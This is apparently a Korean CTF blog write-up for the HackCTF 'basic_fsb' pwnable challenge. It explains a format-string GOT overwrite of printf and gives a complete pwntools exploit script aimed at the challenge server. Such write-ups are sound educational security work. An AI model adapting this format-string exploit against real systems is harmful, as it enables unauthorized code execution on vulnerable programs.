fsb를 이용해 printf got를 덮으면 된다
이렇게 간단하게 오프셋을 구해주고
pwntools 를 이용해 풀었다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3002)
e = ELF('./basic_fsb', checksec=False)
offset = 2
payload = fmtstr_payload(offset, {e.got['printf']:e.sym['flag']})
r.sendline(payload)
r.interactive()
'HackCTF > pwnable' 카테고리의 다른 글
HackCTF - x64 Simple_size_BOF (0) | 2021.11.21 |
---|---|
HackCTF - x64 Buffer Overflow (0) | 2021.11.21 |
HackCTF - 내 버퍼가 흘러넘친다!!! (0) | 2021.11.20 |
HackCTF - Basic_BOF #2 (0) | 2021.11.20 |
Hackctf - Basic_BOF #1 (0) | 2021.11.20 |